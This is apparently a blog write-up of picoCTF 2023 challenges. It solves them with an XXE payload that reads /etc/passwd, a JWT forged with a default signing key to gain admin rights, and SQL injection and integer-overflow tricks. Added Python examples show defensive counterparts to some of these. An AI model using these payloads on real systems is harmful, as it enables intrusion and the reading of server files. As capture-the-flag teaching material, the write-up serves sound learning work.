picoCTF2023

Last updated on September 27, 2024

0x00 findme

The redirect page carries a base64 string: cGljb0NURntwcm94aWVzX2FsbF90aGVfd2F5XzM5Mjg2Yzk3fQ== (it takes two redirects to piece the whole string together)

Decoding it gives picoCTF{proxies_all_the_way_39286c97}

0x01 MatchTheRegex

This one tests a regex match; viewing the page source shows the pattern that has to be matched:

```js
function send_request() {
  let val = document.getElementById("name").value;
  // ^p.....F!?
  fetch(`/flag?input=${val}`)
    .then(res => res.text())
    .then(res => {
      const res_json = JSON.parse(res);
      alert(res_json.flag)
      return false;
    })
  return false;
}
```

Entering picoCTF is enough.

0x02 SOAP

The hint is XML External Entity injection, and the goal is to read /etc/passwd.

Capturing the traffic shows that clicking Details sends an XML body.

Inject directly:

```xml
<!DOCTYPE data[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
<ID>
&xxe;
</ID>
</data>
```
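The server-side counterpart, as an added example that is not part of the original write-up: a Python handler for the same `<data><ID>` request that refuses any DTD before parsing, so the payload above is logged as XXE instead of being expanded into /etc/passwd. The function names and the benign request body are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Payload from the write-up above: an external entity pointing at /etc/passwd.
XXE_PAYLOAD = """<!DOCTYPE data[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
<ID>
&xxe;
</ID>
</data>"""

# A benign request of the same shape (constructed for this example).
BENIGN_BODY = "<data><ID>3</ID></data>"

# An endpoint that only expects <data><ID>...</ID></data> never needs a DTD,
# so any DOCTYPE or ENTITY declaration in the request is refused outright.
_DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

class DtdRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE/ENTITY declaration."""

def contains_dtd(xml_text: str) -> bool:
    return _DTD_MARKER.search(xml_text) is not None

def parse_id(xml_text: str) -> str:
    """Return the <ID> text, refusing any document that carries a DTD.
    Disallowing DTDs entirely is the simplest XXE mitigation: it removes
    the entity-expansion step the payload above depends on."""
    if contains_dtd(xml_text):
        raise DtdRejected("rejected: DTD/entity declaration in untrusted XML")
    node = ET.fromstring(xml_text).find("ID")
    if node is None or not (node.text or "").strip():
        raise ValueError("missing <ID>")
    return node.text.strip()

def classify(xml_text: str) -> str:
    """Label a request body for logging: 'ok', 'xxe' or 'malformed'."""
    try:
        parse_id(xml_text)
        return "ok"
    except DtdRejected:
        return "xxe"
    except (ValueError, ET.ParseError):
        return "malformed"
```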

0x03 More SQLi

SQL injection; try the usual payloads first.

It turns out the query checks password and then username, so the injection point should be the password field.

0x04 Java Code Analysis!?!

Download the source code.

The hint says to find the JWT signing key ("secret key").

JwtService.java in the source tree contains this snippet:

```java
@Autowired
public JwtService(SecretGenerator secretGenerator) {
    this.SECRET_KEY = secretGenerator.getServerSecret();
}
```

The secret key is produced by secretGenerator, so look at SecretGenerator.java.

The key is read from server_secret.txt; when that file does not exist the key falls back to 1234.

Capture a request first; it carries a JWT. Decode it:

```http
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiRnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY3OTkxNDQ1MCwiaWF0IjoxNjc5MzA5NjUwLCJ1c2VySWQiOjEsImVtYWlsIjoidXNlciJ9.Y5f4P9ivWsO5AqnXstKtUKyY02s8y8PL9L2msCAkhiI
```

According to the hint, modify 'role' and 'userId', and sign the token with the key 1234:

```
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiRnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY3OTkxNDQ1MCwiaWF0IjoxNjc5MzA5NjUwLCJ1c2VySWQiOjIsImVtYWlsIjoiYWRtaW4ifQ.g7dC751n3puM1TmnXbihfTGNED5EHyq6EmiQ9Gl4Dzs
```
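An added audit check, not code from the write-up or from the challenge: given a token issued by a live instance, test whether it verifies under the fallback key 1234 from SecretGenerator.java, which is exactly how a deployment that never created server_secret.txt gives itself away. The captured token above is reused for claim inspection only; sign_hs256 (used to build fixtures), the candidate-key list and the other function names are this example's own.

```python
import base64
import hashlib
import hmac
import json

# Token captured in the write-up above (the ordinary "user" account).
CAPTURED_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJyb2xlIjoiRnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY3OTkxNDQ1MCwiaWF0IjoxNjc5MzA5NjUwLCJ1c2VySWQiOjEsImVtYWlsIjoidXNlciJ9."
    "Y5f4P9ivWsO5AqnXstKtUKyY02s8y8PL9L2msCAkhiI"
)
# Fallback key SecretGenerator uses when server_secret.txt is missing.
DEFAULT_KEYS = ["1234"]

def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _hs256(key: str, signing_input: str) -> bytes:
    return hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()

def claims(token: str) -> dict:
    """Decode the payload without verifying it (inspection only)."""
    return json.loads(_b64url_decode(token.split(".")[1]))

def sign_hs256(payload: dict, key: str) -> str:
    """Mint an HS256 token; used here to build fixtures for the audit."""
    header = _b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    body = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}"
    return f"{signing_input}.{_b64url_encode(_hs256(key, signing_input))}"

def verifies_with(token: str, key: str) -> bool:
    header, body, sig = token.split(".")
    return hmac.compare_digest(_hs256(key, f"{header}.{body}"), _b64url_decode(sig))

def weak_key_in_use(token: str, candidates=DEFAULT_KEYS):
    """Return the default key a live token verifies under, or None.
    A hit means the deployment is signing with a secret that is readable
    in its own source tree: rotate it before doing anything else."""
    for key in candidates:
        if verifies_with(token, key):
            return key
    return None
```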

Next it should just be a matter of requesting the PDF that holds the flag.

After a few tries, requesting the flag directly didn't work.

The first book is readable as a plain user, and its PDF path turns out to be /base/books/pdf/3.

Following the numbering, the flag should be at /base/books/pdf/5.

And out comes the flag.

0x05 HideToSee

The hint is "extract", which brings to mind the Linux tool steghide.

```bash
steghide extract -sf atbash.jpg
```

This extracts xqkwKBN{z0bib1wv_l3kzgxb3l_k34ijli2}

Then decrypt it with an online tool or by hand:

picoCTF{atbash_crack_1f84d779}

0x06 ReadMyCert

The downloaded file is a certificate.

Use openssl:

```bash
openssl req -noout -text -in readmycert.csr
```

The flag: picoCTF{read_mycert_aac33761}

0x07 rotation

Caesar cipher.

0x08 Reverse

0x09 Safe Opener 2

For both of these, opening the binary in IDA shows the flag directly.

0x0A hideme

Running binwalk shows several hidden files.

Running foremost carves them out and gives the flag.

0x0B PcapPoisoning

Just search the capture for pico and it's right there.

0x0C who is it

The download is an email; look straight at the headers:

```
Delivered-To: francismanzi@gmail.com
Received: by 2002:ab0:638a:0:0:0:0:0 with SMTP id y10csp123720uao;
Thu, 7 Jul 2022 23:19:48 -0700 (PDT)
X-Google-Smtp-Source: AGRyM1u8MgQ0wT0JmPs4nZbKyuwluXeP+mglR/hb66VElgQnwB8M2ofwYUFsHj+eMYBFAVDPITJc
X-Received: by 2002:a5d:6d06:0:b0:21b:c434:d99e with SMTP id e6-20020a5d6d06000000b0021bc434d99emr1524437wrq.148.1657261188086;
Thu, 07 Jul 2022 23:19:48 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1657261188; cv=none;
d=google.com; s=arc-20160816;
b=FJZQS4geDnyabQ7SUhA2v3roEqcufLmysXkLoRZd3yNXiNQFBFmwm5v5yANvDyyebA
Jfjqv5X8Gujll585xj/MHlVhlEMg0edNWuwnLXj8SmNuPI1Jon9N+fokhSMxy2WxSACE
4MruPo5QBlHdrFq8WNBAFgC1VtO0nR+BQYY18wqotLIQPvkXo3yOUUhx0D+ZjUwXvTKV
yUFGdYulF58Lg7wAH/cLWROIHrraWTSsmaGWoYv577nztzueoG5RC5uUAGIAyzsJRqsV
dCsapFxCUlbYbAgIVraylksCA+veFXfil6ocym8KKnls3j40Vojv0VLhHHZxXruG5x/K
M5cQ==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
h=mime-version:message-id:date:subject:to:from:dkim-signature;
bh=RneTbuEOZUlwei4ZNPvzjmZpQE92irBmuzImA33zPEc=;
b=RUd+ycq1YWbRNn9wB8UgJ8dZz0tHpvmqcEGQkWqzLy/6j3aFzaf7dwdoCtXjTTtrrE
z9g498cmB55fs0x1CAjtzI+Nctb1cbPcnfMCrfsF3LwgYhCErFRnbBbOgqw4eeEB+hk0
sKBN0QVpSLs1HlF8ZK3XiMKA2p3vSgHlbhMDPGnFTLHEQjlM63d/L30Rt8mpQsT77ni/
f6X0TqTi4Y8ARIuEELMa6m5E5wQcfUxeUU5WAssz46tQyHKR6xg/g8K2zES+gSNymASk
c5Eaq55k4Zi8dXWaPIwg4IdhVLVxe4llMx8c46GTdh8tvdMtmjME3wIaFR6Q2SLWRSZA
o0hw==
ARC-Authentication-Results: i=1; mx.google.com;
dkim=pass header.i=@onionmail.org header.s=jan2022 header.b=4sU2nk5Z;
spf=pass (google.com: domain of lpage@onionmail.org designates 173.249.33.206 as permitted sender) smtp.mailfrom=lpage@onionmail.org;
dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=onionmail.org
Return-Path: <lpage@onionmail.org>
Received: from mail.onionmail.org (mail.onionmail.org. [173.249.33.206])
by mx.google.com with ESMTPS id f16-20020a05600c4e9000b003a1947873d6si1882702wmq.224.2022.07.07.23.19.47
for <francismanzi@gmail.com>
(version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
Thu, 07 Jul 2022 23:19:47 -0700 (PDT)
Received-SPF: pass (google.com: domain of lpage@onionmail.org designates 173.249.33.206 as permitted sender) client-ip=173.249.33.206;
Authentication-Results: mx.google.com;
dkim=pass header.i=@onionmail.org header.s=jan2022 header.b=4sU2nk5Z;
spf=pass (google.com: domain of lpage@onionmail.org designates 173.249.33.206 as permitted sender) smtp.mailfrom=lpage@onionmail.org;
dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=onionmail.org
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=onionmail.org;
q=dns/txt; s=jan2022; bh=RneTbuEOZUlwei4ZNPvzjmZpQE92irBmuzImA33zPEc=;
h=from:subject:date:message-id:to:mime-version:content-type;
b=4sU2nk5ZG4F9+lCtCPU4nat6ovALqfOHOUM1/wTskeMdmMAa2yOMXy0GkqolIioL8nG0mRG45
OD8b/nHZZEiA0aQppYHECSmXE7IFIFm/MP9wmXIlC/cDF1t9mEwumdDbes7hRhiO6q3A0wYWK+J
C+qwHI99irsPhWZOptVVh0HV/HJPAtkzg7OBMX/oPDUSG3xo7dJvT5MCYUm2+4CBVjvLmEPUVTO
uuVEU3HjVjumry5zw1H4s+o9jxCOwpT41uL94NM64Aki4+KIlS75W8Uo1YStqciHSHoEPLMvBhK
OMfwhI02u5oLFbk6ZvmhyK5juc54lGbWgk277N0hB0Aw==
Received: from localhost
by mail.onionmail.org (ZoneMTA) with API id 181dc76dff2000ccee.001
for <francismanzi@gmail.com>;
Fri, 08 Jul 2022 06:19:47 +0000
X-Zone-Loop: 83440723a48cf749c9e7702024ee772d7cb2fb7cab7a
Content-Type: multipart/mixed; boundary="--_NmP-426c22a2e0d8fc9a-Part_1"
From: Larry Page <lpage@onionmail.org>
To: francismanzi@gmail.com
Subject: One million Prize
Date: Fri, 08 Jul 2022 06:19:47 +0000
Message-ID: <03c11cd1-8fd9-584e-c9d7-e53df0faeccc@onionmail.org>
MIME-Version: 1.0

----_NmP-426c22a2e0d8fc9a-Part_1
Content-Type: multipart/alternative;
boundary="--_NmP-426c22a2e0d8fc9a-Part_2"

----_NmP-426c22a2e0d8fc9a-Part_2
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable

Hello dear user, I am Larry Page and I am delighted to announce to you that=
you
are the 99999999th GMAIL account and for that we want to reward you. =
You've
earned $1,000,000. To claim your prize open the attached file.
----_NmP-426c22a2e0d8fc9a-Part_2
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<p>Hello dear user, I am Larry Page and I am delighted to announce to you =
that you are the 99999999th GMAIL account and for that we want to reward =
you. You've earned $1,000,000. To claim your prize open the attached file.=
<br></p>
----_NmP-426c22a2e0d8fc9a-Part_2--

----_NmP-426c22a2e0d8fc9a-Part_1
Content-Type: text/plain; name=attachment.txt
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=attachment.txt

QW1vdW50OiAgJDEsMDAwLDAwMAo=
----_NmP-426c22a2e0d8fc9a-Part_1--
```

Walking the headers shows the mail was handed to Gmail by the IP 173.249.33.206.

Then the whois command:

```bash
whois 173.249.33.206
```
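The header walk above as an added example, not part of the original write-up: parse the Received chain with Python's standard email module, pull out the bracketed address of the hop that delivered to Gmail's MX, and collect the SPF/DKIM/DMARC verdicts the MX recorded. The fixture is a trimmed copy of the headers shown above (signatures and body dropped); the function names are this example's own.

```python
import email
import re

# Trimmed copy of the headers from the message above (constructed fixture:
# only the lines the checks need are kept; body and signatures omitted).
RAW_MESSAGE = """\
Received: by 2002:ab0:638a:0:0:0:0:0 with SMTP id y10csp123720uao;
        Thu, 7 Jul 2022 23:19:48 -0700 (PDT)
Received: from mail.onionmail.org (mail.onionmail.org. [173.249.33.206])
        by mx.google.com with ESMTPS id f16-20020a05600c4e9000b003a1947873d6si1882702wmq.224.2022.07.07.23.19.47
        for <francismanzi@gmail.com>;
        Thu, 07 Jul 2022 23:19:47 -0700 (PDT)
Authentication-Results: mx.google.com;
       dkim=pass header.i=@onionmail.org header.s=jan2022 header.b=4sU2nk5Z;
       spf=pass smtp.mailfrom=lpage@onionmail.org;
       dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=onionmail.org
Received: from localhost
        by mail.onionmail.org (ZoneMTA) with API id 181dc76dff2000ccee.001
        for <francismanzi@gmail.com>;
        Fri, 08 Jul 2022 06:19:47 +0000
From: Larry Page <lpage@onionmail.org>
Subject: One million Prize

"""

_BRACKET_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
_AUTH_RESULT = re.compile(r"\b(dkim|spf|dmarc)=(\w+)")

def received_ips(raw: str) -> list:
    """Bracketed IPv4 of each Received: hop in header order (newest hop
    first); None for hops that name no address."""
    msg = email.message_from_string(raw)
    return [
        (m.group(1) if (m := _BRACKET_IP.search(hop)) else None)
        for hop in msg.get_all("Received", [])
    ]

def sending_server(raw: str):
    """Nearest hop the recipient's MX recorded with a bracketed address,
    i.e. the server that actually delivered the mail (mail.onionmail.org here).
    Hops above the MX's own Received line are not trustworthy on their own."""
    return next((ip for ip in received_ips(raw) if ip), None)

def auth_results(raw: str) -> dict:
    """dkim/spf/dmarc verdicts recorded by the receiving MX."""
    hdr = email.message_from_string(raw).get("Authentication-Results", "")
    return dict(_AUTH_RESULT.findall(hdr))
```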

0x0D FindAndOpen

Packet 48 contains a base64 string.

Decoding it gives: This is the secret: picoCTF{R34DING_LOKd_

Using this half as the password for the archive yields the flag picoCTF{R34DING_LOKd_fil56_succ3ss_cbf2ebf6}

0x0E MSB

The image's pixel values vary in the seventh bit plane of each colour channel.

Copy the whole thing out and search it for pico.

0x0F chrono

0x10 money-ware

The hint is to use Google.

0x11 Permissions

Same steps as chrono.

0x12 repetitions

Nested base64 encoding.

Decoding repeatedly gives picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_4557ec3e}

0x13 Rules 2023

Just search the page source for picoCTF{

0x14 two-sum

Download the C source: you enter two numbers that must satisfy n1 > n1 + n2 OR n2 > n1 + n2.

This is an integer overflow.

In C, an int overflows once it exceeds 2147483647.

So enter 21474836471.
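An added illustration (not the challenge's C source) that models the condition in Python: wrap_int32 reproduces 32-bit two's-complement wraparound so the challenge's check can be evaluated, and checked_add shows the bounds test a fixed version would perform before adding. Function names are this example's own; inputs are assumed to already lie within int range.

```python
INT_MAX = 2**31 - 1
INT_MIN = -2**31

def wrap_int32(value: int) -> int:
    """Value a 32-bit two's-complement int holds after wraparound. Signed
    overflow is undefined behaviour in C, but this is what the compiled
    challenge produces on ordinary hardware."""
    return (value + 2**31) % 2**32 - 2**31

def vulnerable_check(n1: int, n2: int) -> bool:
    """The challenge condition evaluated with wraparound: only an
    overflowed sum can be smaller than one of its operands."""
    total = wrap_int32(n1 + n2)
    return n1 > total or n2 > total

def checked_add(n1: int, n2: int) -> int:
    """Overflow-safe version: test the bounds before adding, the same rule
    as a C pre-check of `n2 > INT_MAX - n1` / `n2 < INT_MIN - n1`."""
    if n2 > 0 and n1 > INT_MAX - n2:
        raise OverflowError("n1 + n2 exceeds INT_MAX")
    if n2 < 0 and n1 < INT_MIN - n2:
        raise OverflowError("n1 + n2 is below INT_MIN")
    return n1 + n2

def safe_to_add(n1: int, n2: int) -> bool:
    """True when the sum fits in a 32-bit int."""
    try:
        checked_add(n1, n2)
        return True
    except OverflowError:
        return False
```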

0x15 Ready Gladiator 0

Just entering end produces the flag; I didn't read the source and don't know why it works: picoCTF{h3r0_t0_z3r0_4m1r1gh7_a7bf8a57}

0x16 useless

The flag is, of all places, hidden in the man page:

```bash
man useless
```

0x17 timer

Open it in jadx; the flag is in com/example.timer/BuildConfig: picoCTF{t1m3r_r3v3rs3d_succ355fully_17496}


Author: fru1ts
Link: https://fru1ts.github.io/2023/03/20/picoCTF2023/
Copyright: This site uses the BY-SA license; unless stated otherwise, please credit the source when reposting!